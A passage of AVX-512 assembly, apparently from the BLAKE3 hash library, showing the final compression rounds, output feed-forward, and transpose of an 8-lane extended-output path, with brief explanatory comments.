vpaddd ymm11,ymm11,ymm15
vpxord ymm4,ymm4,ymm8
vpxord ymm5,ymm5,ymm9
vpxord ymm6,ymm6,ymm10
vpxord ymm7,ymm7,ymm11
vprord ymm4,ymm4,0xc
vprord ymm5,ymm5,0xc
vprord ymm6,ymm6,0xc
vprord ymm7,ymm7,0xc
vpaddd ymm0,ymm0,ymm22
vpaddd ymm1,ymm1,ymm26
vpaddd ymm2,ymm2,ymm16
vpaddd ymm3,ymm3,ymm29
vpaddd ymm0,ymm0,ymm4
vpaddd ymm1,ymm1,ymm5
vpaddd ymm2,ymm2,ymm6
vpaddd ymm3,ymm3,ymm7
vpxord ymm12,ymm12,ymm0
vpxord ymm13,ymm13,ymm1
vpxord ymm14,ymm14,ymm2
vpxord ymm15,ymm15,ymm3
vprord ymm12,ymm12,0x8
vprord ymm13,ymm13,0x8
vprord ymm14,ymm14,0x8
vprord ymm15,ymm15,0x8
vpaddd ymm8,ymm8,ymm12
vpaddd ymm9,ymm9,ymm13
vpaddd ymm10,ymm10,ymm14
vpaddd ymm11,ymm11,ymm15
vpxord ymm4,ymm4,ymm8
vpxord ymm5,ymm5,ymm9
vpxord ymm6,ymm6,ymm10
vpxord ymm7,ymm7,ymm11
vprord ymm4,ymm4,0x7
vprord ymm5,ymm5,0x7
vprord ymm6,ymm6,0x7
vprord ymm7,ymm7,0x7
vpaddd ymm0,ymm0,ymm17
vpaddd ymm1,ymm1,ymm28
vpaddd ymm2,ymm2,ymm25
vpaddd ymm3,ymm3,ymm31
vpaddd ymm0,ymm0,ymm5
vpaddd ymm1,ymm1,ymm6
vpaddd ymm2,ymm2,ymm7
vpaddd ymm3,ymm3,ymm4
vpxord ymm15,ymm15,ymm0
vpxord ymm12,ymm12,ymm1
vpxord ymm13,ymm13,ymm2
vpxord ymm14,ymm14,ymm3
vprord ymm15,ymm15,0x10
vprord ymm12,ymm12,0x10
vprord ymm13,ymm13,0x10
vprord ymm14,ymm14,0x10
vpaddd ymm10,ymm10,ymm15
vpaddd ymm11,ymm11,ymm12
vpaddd ymm8,ymm8,ymm13
vpaddd ymm9,ymm9,ymm14
vpxord ymm5,ymm5,ymm10
vpxord ymm6,ymm6,ymm11
vpxord ymm7,ymm7,ymm8
vpxord ymm4,ymm4,ymm9
vprord ymm5,ymm5,0xc
vprord ymm6,ymm6,0xc
vprord ymm7,ymm7,0xc
vprord ymm4,ymm4,0xc
vpaddd ymm0,ymm0,ymm27
vpaddd ymm1,ymm1,ymm21
vpaddd ymm2,ymm2,ymm30
vpaddd ymm3,ymm3,ymm24
vpaddd ymm0,ymm0,ymm5
vpaddd ymm1,ymm1,ymm6
vpaddd ymm2,ymm2,ymm7
vpaddd ymm3,ymm3,ymm4
vpxord ymm15,ymm15,ymm0
vpxord ymm12,ymm12,ymm1
vpxord ymm13,ymm13,ymm2
vpxord ymm14,ymm14,ymm3
vprord ymm15,ymm15,0x8
vprord ymm12,ymm12,0x8
vprord ymm13,ymm13,0x8
vprord ymm14,ymm14,0x8
vpaddd ymm10,ymm10,ymm15
vpaddd ymm11,ymm11,ymm12
vpaddd ymm8,ymm8,ymm13
vpaddd ymm9,ymm9,ymm14
vpxord ymm5,ymm5,ymm10
vpxord ymm6,ymm6,ymm11
vpxord ymm7,ymm7,ymm8
vpxord ymm4,ymm4,ymm9
vprord ymm5,ymm5,0x7
vprord ymm6,ymm6,0x7
vprord ymm7,ymm7,0x7
vprord ymm4,ymm4,0x7
vpaddd ymm0,ymm0,ymm19
vpaddd ymm1,ymm1,ymm26
vpaddd ymm2,ymm2,ymm29
vpaddd ymm3,ymm3,ymm23
vpaddd ymm0,ymm0,ymm4
vpaddd ymm1,ymm1,ymm5
vpaddd ymm2,ymm2,ymm6
vpaddd ymm3,ymm3,ymm7
vpxord ymm12,ymm12,ymm0
vpxord ymm13,ymm13,ymm1
vpxord ymm14,ymm14,ymm2
vpxord ymm15,ymm15,ymm3
vprord ymm12,ymm12,0x10
vprord ymm13,ymm13,0x10
vprord ymm14,ymm14,0x10
vprord ymm15,ymm15,0x10
vpaddd ymm8,ymm8,ymm12
vpaddd ymm9,ymm9,ymm13
vpaddd ymm10,ymm10,ymm14
vpaddd ymm11,ymm11,ymm15
vpxord ymm4,ymm4,ymm8
vpxord ymm5,ymm5,ymm9
vpxord ymm6,ymm6,ymm10
vpxord ymm7,ymm7,ymm11
vprord ymm4,ymm4,0xc
vprord ymm5,ymm5,0xc
vprord ymm6,ymm6,0xc
vprord ymm7,ymm7,0xc
vpaddd ymm0,ymm0,ymm20
vpaddd ymm1,ymm1,ymm28
vpaddd ymm2,ymm2,ymm18
vpaddd ymm3,ymm3,ymm30
vpaddd ymm0,ymm0,ymm4
vpaddd ymm1,ymm1,ymm5
vpaddd ymm2,ymm2,ymm6
vpaddd ymm3,ymm3,ymm7
vpxord ymm12,ymm12,ymm0
vpxord ymm13,ymm13,ymm1
vpxord ymm14,ymm14,ymm2
vpxord ymm15,ymm15,ymm3
vprord ymm12,ymm12,0x8
vprord ymm13,ymm13,0x8
vprord ymm14,ymm14,0x8
vprord ymm15,ymm15,0x8
vpaddd ymm8,ymm8,ymm12
vpaddd ymm9,ymm9,ymm13
vpaddd ymm10,ymm10,ymm14
vpaddd ymm11,ymm11,ymm15
vpxord ymm4,ymm4,ymm8
vpxord ymm5,ymm5,ymm9
vpxord ymm6,ymm6,ymm10
vpxord ymm7,ymm7,ymm11
vprord ymm4,ymm4,0x7
vprord ymm5,ymm5,0x7
vprord ymm6,ymm6,0x7
vprord ymm7,ymm7,0x7
vpaddd ymm0,ymm0,ymm22
vpaddd ymm1,ymm1,ymm25
vpaddd ymm2,ymm2,ymm27
vpaddd ymm3,ymm3,ymm24
vpaddd ymm0,ymm0,ymm5
vpaddd ymm1,ymm1,ymm6
vpaddd ymm2,ymm2,ymm7
vpaddd ymm3,ymm3,ymm4
vpxord ymm15,ymm15,ymm0
vpxord ymm12,ymm12,ymm1
vpxord ymm13,ymm13,ymm2
vpxord ymm14,ymm14,ymm3
vprord ymm15,ymm15,0x10
vprord ymm12,ymm12,0x10
vprord ymm13,ymm13,0x10
vprord ymm14,ymm14,0x10
vpaddd ymm10,ymm10,ymm15
vpaddd ymm11,ymm11,ymm12
vpaddd ymm8,ymm8,ymm13
vpaddd ymm9,ymm9,ymm14
vpxord ymm5,ymm5,ymm10
vpxord ymm6,ymm6,ymm11
vpxord ymm7,ymm7,ymm8
vpxord ymm4,ymm4,ymm9
vprord ymm5,ymm5,0xc
vprord ymm6,ymm6,0xc
vprord ymm7,ymm7,0xc
vprord ymm4,ymm4,0xc
vpaddd ymm0,ymm0,ymm21
vpaddd ymm1,ymm1,ymm16
vpaddd ymm2,ymm2,ymm31
vpaddd ymm3,ymm3,ymm17
vpaddd ymm0,ymm0,ymm5
vpaddd ymm1,ymm1,ymm6
vpaddd ymm2,ymm2,ymm7
vpaddd ymm3,ymm3,ymm4
vpxord ymm15,ymm15,ymm0
vpxord ymm12,ymm12,ymm1
vpxord ymm13,ymm13,ymm2
vpxord ymm14,ymm14,ymm3
vprord ymm15,ymm15,0x8
vprord ymm12,ymm12,0x8
vprord ymm13,ymm13,0x8
vprord ymm14,ymm14,0x8
vpaddd ymm10,ymm10,ymm15
vpaddd ymm11,ymm11,ymm12
vpaddd ymm8,ymm8,ymm13
vpaddd ymm9,ymm9,ymm14
vpxord ymm5,ymm5,ymm10
vpxord ymm6,ymm6,ymm11
vpxord ymm7,ymm7,ymm8
vpxord ymm4,ymm4,ymm9
vprord ymm5,ymm5,0x7
vprord ymm6,ymm6,0x7
vprord ymm7,ymm7,0x7
vprord ymm4,ymm4,0x7
vpaddd ymm0,ymm0,ymm26
vpaddd ymm1,ymm1,ymm28
vpaddd ymm2,ymm2,ymm30
vpaddd ymm3,ymm3,ymm29
vpaddd ymm0,ymm0,ymm4
vpaddd ymm1,ymm1,ymm5
vpaddd ymm2,ymm2,ymm6
vpaddd ymm3,ymm3,ymm7
vpxord ymm12,ymm12,ymm0
vpxord ymm13,ymm13,ymm1
vpxord ymm14,ymm14,ymm2
vpxord ymm15,ymm15,ymm3
vprord ymm12,ymm12,0x10
vprord ymm13,ymm13,0x10
vprord ymm14,ymm14,0x10
vprord ymm15,ymm15,0x10
vpaddd ymm8,ymm8,ymm12
vpaddd ymm9,ymm9,ymm13
vpaddd ymm10,ymm10,ymm14
vpaddd ymm11,ymm11,ymm15
vpxord ymm4,ymm4,ymm8
vpxord ymm5,ymm5,ymm9
vpxord ymm6,ymm6,ymm10
vpxord ymm7,ymm7,ymm11
vprord ymm4,ymm4,0xc
vprord ymm5,ymm5,0xc
vprord ymm6,ymm6,0xc
vprord ymm7,ymm7,0xc
vpaddd ymm0,ymm0,ymm23
vpaddd ymm1,ymm1,ymm25
vpaddd ymm2,ymm2,ymm19
vpaddd ymm3,ymm3,ymm31
vpaddd ymm0,ymm0,ymm4
vpaddd ymm1,ymm1,ymm5
vpaddd ymm2,ymm2,ymm6
vpaddd ymm3,ymm3,ymm7
vpxord ymm12,ymm12,ymm0
vpxord ymm13,ymm13,ymm1
vpxord ymm14,ymm14,ymm2
vpxord ymm15,ymm15,ymm3
vprord ymm12,ymm12,0x8
vprord ymm13,ymm13,0x8
vprord ymm14,ymm14,0x8
vprord ymm15,ymm15,0x8
vpaddd ymm8,ymm8,ymm12
vpaddd ymm9,ymm9,ymm13
vpaddd ymm10,ymm10,ymm14
vpaddd ymm11,ymm11,ymm15
vpxord ymm4,ymm4,ymm8
vpxord ymm5,ymm5,ymm9
vpxord ymm6,ymm6,ymm10
vpxord ymm7,ymm7,ymm11
vprord ymm4,ymm4,0x7
vprord ymm5,ymm5,0x7
vprord ymm6,ymm6,0x7
vprord ymm7,ymm7,0x7
vpaddd ymm0,ymm0,ymm20
vpaddd ymm1,ymm1,ymm27
vpaddd ymm2,ymm2,ymm21
vpaddd ymm3,ymm3,ymm17
vpaddd ymm0,ymm0,ymm5
vpaddd ymm1,ymm1,ymm6
vpaddd ymm2,ymm2,ymm7
vpaddd ymm3,ymm3,ymm4
vpxord ymm15,ymm15,ymm0
vpxord ymm12,ymm12,ymm1
vpxord ymm13,ymm13,ymm2
vpxord ymm14,ymm14,ymm3
vprord ymm15,ymm15,0x10
vprord ymm12,ymm12,0x10
vprord ymm13,ymm13,0x10
vprord ymm14,ymm14,0x10
vpaddd ymm10,ymm10,ymm15
vpaddd ymm11,ymm11,ymm12
vpaddd ymm8,ymm8,ymm13
vpaddd ymm9,ymm9,ymm14
vpxord ymm5,ymm5,ymm10
vpxord ymm6,ymm6,ymm11
vpxord ymm7,ymm7,ymm8
vpxord ymm4,ymm4,ymm9
vprord ymm5,ymm5,0xc
vprord ymm6,ymm6,0xc
vprord ymm7,ymm7,0xc
vprord ymm4,ymm4,0xc
vpaddd ymm0,ymm0,ymm16
vpaddd ymm1,ymm1,ymm18
vpaddd ymm2,ymm2,ymm24
vpaddd ymm3,ymm3,ymm22
vpaddd ymm0,ymm0,ymm5
vpaddd ymm1,ymm1,ymm6
vpaddd ymm2,ymm2,ymm7
vpaddd ymm3,ymm3,ymm4
vpxord ymm15,ymm15,ymm0
vpxord ymm12,ymm12,ymm1
vpxord ymm13,ymm13,ymm2
vpxord ymm14,ymm14,ymm3
vprord ymm15,ymm15,0x8
vprord ymm12,ymm12,0x8
vprord ymm13,ymm13,0x8
vprord ymm14,ymm14,0x8
vpaddd ymm10,ymm10,ymm15
vpaddd ymm11,ymm11,ymm12
vpaddd ymm8,ymm8,ymm13
vpaddd ymm9,ymm9,ymm14
vpxord ymm5,ymm5,ymm10
vpxord ymm6,ymm6,ymm11
vpxord ymm7,ymm7,ymm8
vpxord ymm4,ymm4,ymm9
vprord ymm5,ymm5,0x7
vprord ymm6,ymm6,0x7
vprord ymm7,ymm7,0x7
vprord ymm4,ymm4,0x7
vpaddd ymm0,ymm0,ymm28
vpaddd ymm1,ymm1,ymm25
vpaddd ymm2,ymm2,ymm31
vpaddd ymm3,ymm3,ymm30
vpaddd ymm0,ymm0,ymm4
vpaddd ymm1,ymm1,ymm5
vpaddd ymm2,ymm2,ymm6
vpaddd ymm3,ymm3,ymm7
vpxord ymm12,ymm12,ymm0
vpxord ymm13,ymm13,ymm1
vpxord ymm14,ymm14,ymm2
vpxord ymm15,ymm15,ymm3
vprord ymm12,ymm12,0x10
vprord ymm13,ymm13,0x10
vprord ymm14,ymm14,0x10
vprord ymm15,ymm15,0x10
vpaddd ymm8,ymm8,ymm12
vpaddd ymm9,ymm9,ymm13
vpaddd ymm10,ymm10,ymm14
vpaddd ymm11,ymm11,ymm15
vpxord ymm4,ymm4,ymm8
vpxord ymm5,ymm5,ymm9
vpxord ymm6,ymm6,ymm10
vpxord ymm7,ymm7,ymm11
vprord ymm4,ymm4,0xc
vprord ymm5,ymm5,0xc
vprord ymm6,ymm6,0xc
vprord ymm7,ymm7,0xc
vpaddd ymm0,ymm0,ymm29
vpaddd ymm1,ymm1,ymm27
vpaddd ymm2,ymm2,ymm26
vpaddd ymm3,ymm3,ymm24
vpaddd ymm0,ymm0,ymm4
vpaddd ymm1,ymm1,ymm5
vpaddd ymm2,ymm2,ymm6
vpaddd ymm3,ymm3,ymm7
vpxord ymm12,ymm12,ymm0
vpxord ymm13,ymm13,ymm1
vpxord ymm14,ymm14,ymm2
vpxord ymm15,ymm15,ymm3
vprord ymm12,ymm12,0x8
vprord ymm13,ymm13,0x8
vprord ymm14,ymm14,0x8
vprord ymm15,ymm15,0x8
vpaddd ymm8,ymm8,ymm12
vpaddd ymm9,ymm9,ymm13
vpaddd ymm10,ymm10,ymm14
vpaddd ymm11,ymm11,ymm15
vpxord ymm4,ymm4,ymm8
vpxord ymm5,ymm5,ymm9
vpxord ymm6,ymm6,ymm10
vpxord ymm7,ymm7,ymm11
vprord ymm4,ymm4,0x7
vprord ymm5,ymm5,0x7
vprord ymm6,ymm6,0x7
vprord ymm7,ymm7,0x7
vpaddd ymm0,ymm0,ymm23
vpaddd ymm1,ymm1,ymm21
vpaddd ymm2,ymm2,ymm16
vpaddd ymm3,ymm3,ymm22
vpaddd ymm0,ymm0,ymm5
vpaddd ymm1,ymm1,ymm6
vpaddd ymm2,ymm2,ymm7
vpaddd ymm3,ymm3,ymm4
vpxord ymm15,ymm15,ymm0
vpxord ymm12,ymm12,ymm1
vpxord ymm13,ymm13,ymm2
vpxord ymm14,ymm14,ymm3
vprord ymm15,ymm15,0x10
vprord ymm12,ymm12,0x10
vprord ymm13,ymm13,0x10
vprord ymm14,ymm14,0x10
vpaddd ymm10,ymm10,ymm15
vpaddd ymm11,ymm11,ymm12
vpaddd ymm8,ymm8,ymm13
vpaddd ymm9,ymm9,ymm14
vpxord ymm5,ymm5,ymm10
vpxord ymm6,ymm6,ymm11
vpxord ymm7,ymm7,ymm8
vpxord ymm4,ymm4,ymm9
vprord ymm5,ymm5,0xc
vprord ymm6,ymm6,0xc
vprord ymm7,ymm7,0xc
vprord ymm4,ymm4,0xc
vpaddd ymm0,ymm0,ymm18
vpaddd ymm1,ymm1,ymm19
vpaddd ymm2,ymm2,ymm17
vpaddd ymm3,ymm3,ymm20
vpaddd ymm0,ymm0,ymm5
vpaddd ymm1,ymm1,ymm6
vpaddd ymm2,ymm2,ymm7
vpaddd ymm3,ymm3,ymm4
vpxord ymm15,ymm15,ymm0
vpxord ymm12,ymm12,ymm1
vpxord ymm13,ymm13,ymm2
vpxord ymm14,ymm14,ymm3
vprord ymm15,ymm15,0x8
vprord ymm12,ymm12,0x8
vprord ymm13,ymm13,0x8
vprord ymm14,ymm14,0x8
vpaddd ymm10,ymm10,ymm15
vpaddd ymm11,ymm11,ymm12
vpaddd ymm8,ymm8,ymm13
vpaddd ymm9,ymm9,ymm14
vpxord ymm5,ymm5,ymm10
vpxord ymm6,ymm6,ymm11
vpxord ymm7,ymm7,ymm8
vpxord ymm4,ymm4,ymm9
vprord ymm5,ymm5,0x7
vprord ymm6,ymm6,0x7
vprord ymm7,ymm7,0x7
vprord ymm4,ymm4,0x7
vpaddd ymm0,ymm0,ymm25
vpaddd ymm1,ymm1,ymm27
vpaddd ymm2,ymm2,ymm24
vpaddd ymm3,ymm3,ymm31
vpaddd ymm0,ymm0,ymm4
vpaddd ymm1,ymm1,ymm5
vpaddd ymm2,ymm2,ymm6
vpaddd ymm3,ymm3,ymm7
vpxord ymm12,ymm12,ymm0
vpxord ymm13,ymm13,ymm1
vpxord ymm14,ymm14,ymm2
vpxord ymm15,ymm15,ymm3
vprord ymm12,ymm12,0x10
vprord ymm13,ymm13,0x10
vprord ymm14,ymm14,0x10
vprord ymm15,ymm15,0x10
vpaddd ymm8,ymm8,ymm12
vpaddd ymm9,ymm9,ymm13
vpaddd ymm10,ymm10,ymm14
vpaddd ymm11,ymm11,ymm15
vpxord ymm4,ymm4,ymm8
vpxord ymm5,ymm5,ymm9
vpxord ymm6,ymm6,ymm10
vpxord ymm7,ymm7,ymm11
vprord ymm4,ymm4,0xc
vprord ymm5,ymm5,0xc
vprord ymm6,ymm6,0xc
vprord ymm7,ymm7,0xc
vpaddd ymm0,ymm0,ymm30
vpaddd ymm1,ymm1,ymm21
vpaddd ymm2,ymm2,ymm28
vpaddd ymm3,ymm3,ymm17
vpaddd ymm0,ymm0,ymm4
vpaddd ymm1,ymm1,ymm5
vpaddd ymm2,ymm2,ymm6
vpaddd ymm3,ymm3,ymm7
vpxord ymm12,ymm12,ymm0
vpxord ymm13,ymm13,ymm1
vpxord ymm14,ymm14,ymm2
vpxord ymm15,ymm15,ymm3
vprord ymm12,ymm12,0x8
vprord ymm13,ymm13,0x8
vprord ymm14,ymm14,0x8
vprord ymm15,ymm15,0x8
vpaddd ymm8,ymm8,ymm12
vpaddd ymm9,ymm9,ymm13
vpaddd ymm10,ymm10,ymm14
vpaddd ymm11,ymm11,ymm15
vpxord ymm4,ymm4,ymm8
vpxord ymm5,ymm5,ymm9
vpxord ymm6,ymm6,ymm10
vpxord ymm7,ymm7,ymm11
vprord ymm4,ymm4,0x7
vprord ymm5,ymm5,0x7
vprord ymm6,ymm6,0x7
vprord ymm7,ymm7,0x7
vpaddd ymm0,ymm0,ymm29
vpaddd ymm1,ymm1,ymm16
vpaddd ymm2,ymm2,ymm18
vpaddd ymm3,ymm3,ymm20
vpaddd ymm0,ymm0,ymm5
vpaddd ymm1,ymm1,ymm6
vpaddd ymm2,ymm2,ymm7
vpaddd ymm3,ymm3,ymm4
vpxord ymm15,ymm15,ymm0
vpxord ymm12,ymm12,ymm1
vpxord ymm13,ymm13,ymm2
vpxord ymm14,ymm14,ymm3
vprord ymm15,ymm15,0x10
vprord ymm12,ymm12,0x10
vprord ymm13,ymm13,0x10
vprord ymm14,ymm14,0x10
vpaddd ymm10,ymm10,ymm15
vpaddd ymm11,ymm11,ymm12
vpaddd ymm8,ymm8,ymm13
vpaddd ymm9,ymm9,ymm14
vpxord ymm5,ymm5,ymm10
vpxord ymm6,ymm6,ymm11
vpxord ymm7,ymm7,ymm8
vpxord ymm4,ymm4,ymm9
vprord ymm5,ymm5,0xc
vprord ymm6,ymm6,0xc
vprord ymm7,ymm7,0xc
vprord ymm4,ymm4,0xc
vpaddd ymm0,ymm0,ymm19
vpaddd ymm1,ymm1,ymm26
vpaddd ymm2,ymm2,ymm22
vpaddd ymm3,ymm3,ymm23
vpaddd ymm0,ymm0,ymm5
vpaddd ymm1,ymm1,ymm6
vpaddd ymm2,ymm2,ymm7
vpaddd ymm3,ymm3,ymm4
vpxord ymm15,ymm15,ymm0
vpxord ymm12,ymm12,ymm1
vpxord ymm13,ymm13,ymm2
vpxord ymm14,ymm14,ymm3
vprord ymm15,ymm15,0x8
vprord ymm12,ymm12,0x8
vprord ymm13,ymm13,0x8
vprord ymm14,ymm14,0x8
vpaddd ymm10,ymm10,ymm15
vpaddd ymm11,ymm11,ymm12
vpaddd ymm8,ymm8,ymm13
vpaddd ymm9,ymm9,ymm14
vpxord ymm5,ymm5,ymm10
vpxord ymm6,ymm6,ymm11
vpxord ymm7,ymm7,ymm8
vpxord ymm4,ymm4,ymm9
vprord ymm5,ymm5,0x7
vprord ymm6,ymm6,0x7
vprord ymm7,ymm7,0x7
vprord ymm4,ymm4,0x7
vpaddd ymm0,ymm0,ymm27
vpaddd ymm1,ymm1,ymm21
vpaddd ymm2,ymm2,ymm17
vpaddd ymm3,ymm3,ymm24
vpaddd ymm0,ymm0,ymm4
vpaddd ymm1,ymm1,ymm5
vpaddd ymm2,ymm2,ymm6
vpaddd ymm3,ymm3,ymm7
vpxord ymm12,ymm12,ymm0
vpxord ymm13,ymm13,ymm1
vpxord ymm14,ymm14,ymm2
vpxord ymm15,ymm15,ymm3
vprord ymm12,ymm12,0x10
vprord ymm13,ymm13,0x10
vprord ymm14,ymm14,0x10
vprord ymm15,ymm15,0x10
vpaddd ymm8,ymm8,ymm12
vpaddd ymm9,ymm9,ymm13
vpaddd ymm10,ymm10,ymm14
vpaddd ymm11,ymm11,ymm15
vpxord ymm4,ymm4,ymm8
vpxord ymm5,ymm5,ymm9
vpxord ymm6,ymm6,ymm10
vpxord ymm7,ymm7,ymm11
vprord ymm4,ymm4,0xc
vprord ymm5,ymm5,0xc
vprord ymm6,ymm6,0xc
vprord ymm7,ymm7,0xc
vpaddd ymm0,ymm0,ymm31
vpaddd ymm1,ymm1,ymm16
vpaddd ymm2,ymm2,ymm25
vpaddd ymm3,ymm3,ymm22
vpaddd ymm0,ymm0,ymm4
vpaddd ymm1,ymm1,ymm5
vpaddd ymm2,ymm2,ymm6
vpaddd ymm3,ymm3,ymm7
vpxord ymm12,ymm12,ymm0
vpxord ymm13,ymm13,ymm1
vpxord ymm14,ymm14,ymm2
vpxord ymm15,ymm15,ymm3
vprord ymm12,ymm12,0x8
vprord ymm13,ymm13,0x8
vprord ymm14,ymm14,0x8
vprord ymm15,ymm15,0x8
vpaddd ymm8,ymm8,ymm12
vpaddd ymm9,ymm9,ymm13
vpaddd ymm10,ymm10,ymm14
vpaddd ymm11,ymm11,ymm15
vpxord ymm4,ymm4,ymm8
vpxord ymm5,ymm5,ymm9
vpxord ymm6,ymm6,ymm10
vpxord ymm7,ymm7,ymm11
vprord ymm4,ymm4,0x7
vprord ymm5,ymm5,0x7
vprord ymm6,ymm6,0x7
vprord ymm7,ymm7,0x7
vpaddd ymm0,ymm0,ymm30
vpaddd ymm1,ymm1,ymm18
vpaddd ymm2,ymm2,ymm19
vpaddd ymm3,ymm3,ymm23
vpaddd ymm0,ymm0,ymm5
vpaddd ymm1,ymm1,ymm6
vpaddd ymm2,ymm2,ymm7
vpaddd ymm3,ymm3,ymm4
vpxord ymm15,ymm15,ymm0
vpxord ymm12,ymm12,ymm1
vpxord ymm13,ymm13,ymm2
vpxord ymm14,ymm14,ymm3
vprord ymm15,ymm15,0x10
vprord ymm12,ymm12,0x10
vprord ymm13,ymm13,0x10
vprord ymm14,ymm14,0x10
vpaddd ymm10,ymm10,ymm15
vpaddd ymm11,ymm11,ymm12
vpaddd ymm8,ymm8,ymm13
vpaddd ymm9,ymm9,ymm14
vpxord ymm5,ymm5,ymm10
vpxord ymm6,ymm6,ymm11
vpxord ymm7,ymm7,ymm8
vpxord ymm4,ymm4,ymm9
vprord ymm5,ymm5,0xc
vprord ymm6,ymm6,0xc
vprord ymm7,ymm7,0xc
vprord ymm4,ymm4,0xc
vpaddd ymm0,ymm0,ymm26
vpaddd ymm1,ymm1,ymm28
vpaddd ymm2,ymm2,ymm20
vpaddd ymm3,ymm3,ymm29
vpaddd ymm0,ymm0,ymm5
vpaddd ymm1,ymm1,ymm6
vpaddd ymm2,ymm2,ymm7
vpaddd ymm3,ymm3,ymm4
vpxord ymm15,ymm15,ymm0
vpxord ymm12,ymm12,ymm1
vpxord ymm13,ymm13,ymm2
vpxord ymm14,ymm14,ymm3
vprord ymm15,ymm15,0x8
vprord ymm12,ymm12,0x8
vprord ymm13,ymm13,0x8
vprord ymm14,ymm14,0x8
vpaddd ymm10,ymm10,ymm15
vpaddd ymm11,ymm11,ymm12
vpaddd ymm8,ymm8,ymm13
vpaddd ymm9,ymm9,ymm14
vpxord ymm5,ymm5,ymm10
vpxord ymm6,ymm6,ymm11
vpxord ymm7,ymm7,ymm8
vpxord ymm4,ymm4,ymm9
vprord ymm5,ymm5,0x7
vprord ymm6,ymm6,0x7
vprord ymm7,ymm7,0x7
vprord ymm4,ymm4,0x7
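// End of the 7 compression rounds for this 8-way ymm path. What follows is
// the BLAKE3 output feed-forward: state rows 0-7 are XORed with rows 8-15,
// and rows 8-15 are XORed with the input chaining value. The {1to8}
// broadcasts below reuse a single chaining value at [rdi] across all eight
// lanes, which suggests this is the extended-output (XOF) path emitting a
// full 64 bytes per lane.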
vpxor ymm0,ymm0,ymm8
vpxor ymm1,ymm1,ymm9
vpxor ymm2,ymm2,ymm10
vpxor ymm3,ymm3,ymm11
vpxor ymm4,ymm4,ymm12
vpxor ymm5,ymm5,ymm13
vpxor ymm6,ymm6,ymm14
vpxor ymm7,ymm7,ymm15
vpxord ymm8,ymm8,DWORD PTR [rdi]{1to8}
vpxord ymm9,ymm9,DWORD PTR [rdi+0x4]{1to8}
vpxord ymm10,ymm10,DWORD PTR [rdi+0x8]{1to8}
vpxord ymm11,ymm11,DWORD PTR [rdi+0xc]{1to8}
vpxord ymm12,ymm12,DWORD PTR [rdi+0x10]{1to8}
vpxord ymm13,ymm13,DWORD PTR [rdi+0x14]{1to8}
vpxord ymm14,ymm14,DWORD PTR [rdi+0x18]{1to8}
vpxord ymm15,ymm15,DWORD PTR [rdi+0x1c]{1to8}
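// Transpose the 16 word-sliced state rows (one dword per lane) into eight
// contiguous 64-byte output blocks: dword unpacks, then qword unpacks, then
// vshufi32x4 to exchange 128-bit lanes between register halves.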
vpunpckldq ymm16,ymm0,ymm1
vpunpckhdq ymm17,ymm0,ymm1
vpunpckldq ymm18,ymm2,ymm3
vpunpckhdq ymm19,ymm2,ymm3
vpunpckldq ymm20,ymm4,ymm5
vpunpckhdq ymm21,ymm4,ymm5
vpunpckldq ymm22,ymm6,ymm7
vpunpckhdq ymm23,ymm6,ymm7
vpunpckldq ymm24,ymm8,ymm9
vpunpckhdq ymm25,ymm8,ymm9
vpunpckldq ymm26,ymm10,ymm11
vpunpckhdq ymm27,ymm10,ymm11
vpunpckldq ymm28,ymm12,ymm13
vpunpckhdq ymm29,ymm12,ymm13
vpunpckldq ymm30,ymm14,ymm15
vpunpckhdq ymm31,ymm14,ymm15
vpunpcklqdq ymm0,ymm16,ymm18
vpunpckhqdq ymm1,ymm16,ymm18
vpunpcklqdq ymm2,ymm17,ymm19
vpunpckhqdq ymm3,ymm17,ymm19
vpunpcklqdq ymm4,ymm20,ymm22
vpunpckhqdq ymm5,ymm20,ymm22
vpunpcklqdq ymm6,ymm21,ymm23
vpunpckhqdq ymm7,ymm21,ymm23
vpunpcklqdq ymm8,ymm24,ymm26
vpunpckhqdq ymm9,ymm24,ymm26
vpunpcklqdq ymm10,ymm25,ymm27
vpunpckhqdq ymm11,ymm25,ymm27
vpunpcklqdq ymm12,ymm28,ymm30
vpunpckhqdq ymm13,ymm28,ymm30
vpunpcklqdq ymm14,ymm29,ymm31
vpunpckhqdq ymm15,ymm29,ymm31
vshufi32x4 ymm16,ymm0,ymm4,0x0
vshufi32x4 ymm17,ymm8,ymm12,0x0
vshufi32x4 ymm18,ymm1,ymm5,0x0
vshufi32x4 ymm19,ymm9,ymm13,0x0
vshufi32x4 ymm20,ymm2,ymm6,0x0
vshufi32x4 ymm21,ymm10,ymm14,0x0
vshufi32x4 ymm22,ymm3,ymm7,0x0
vshufi32x4 ymm23,ymm11,ymm15,0x0
vshufi32x4 ymm24,ymm0,ymm4,0x3
vshufi32x4 ymm25,ymm8,ymm12,0x3
vshufi32x4 ymm26,ymm1,ymm5,0x3
vshufi32x4 ymm27,ymm9,ymm13,0x3
vshufi32x4 ymm28,ymm2,ymm6,0x3
vshufi32x4 ymm29,ymm10,ymm14,0x3
vshufi32x4 ymm30,ymm3,ymm7,0x3
vshufi32x4 ymm31,ymm11,ymm15,0x3
vmovdqu32 YMMWORD PTR [r9],ymm16
vmovdqu32 YMMWORD PTR [r9+0x20],ymm17
vmovdqu32 YMMWORD PTR [r9+0x40],ymm18
vmovdqu32 YMMWORD PTR [r9+0x60],ymm19
vmovdqu32 YMMWORD PTR [r9+0x80],ymm20
vmovdqu32 YMMWORD PTR [r9+0xa0],ymm21
vmovdqu32 YMMWORD PTR [r9+0xc0],ymm22
vmovdqu32 YMMWORD PTR [r9+0xe0],ymm23
vmovdqu32 YMMWORD PTR [r9+0x100],ymm24
vmovdqu32 YMMWORD PTR [r9+0x120],ymm25
vmovdqu32 YMMWORD PTR [r9+0x140],ymm26
vmovdqu32 YMMWORD PTR [r9+0x160],ymm27
vmovdqu32 YMMWORD PTR [r9+0x180],ymm28
vmovdqu32 YMMWORD PTR [r9+0x1a0],ymm29
vmovdqu32 YMMWORD PTR [r9+0x1c0],ymm30
vmovdqu32 YMMWORD PTR [r9+0x1e0],ymm31
vmovdqa ymm0,YMMWORD PTR [rsp+0x20]
vmovdqa ymm1,YMMWORD PTR [rsp+0x60]
vmovdqa YMMWORD PTR [rsp],ymm0
vmovdqa YMMWORD PTR [rsp+0x40],ymm1
add r9,0x200
sub r10,0x8
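// The section above appears to handle the eight-output portion of the
// remaining count in r10; the vmovdqa pair shifts the saved counter vectors
// forward so the narrower 4-, 2- and 1-lane sections below start from the
// correct counters.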
2:
test r10,0x4
je 2f
vbroadcasti32x4 zmm0,XMMWORD PTR [rdi]
vbroadcasti32x4 zmm1,XMMWORD PTR [rdi+0x10]
vbroadcasti32x4 zmm2,XMMWORD PTR [BLAKE3_IV+rip]
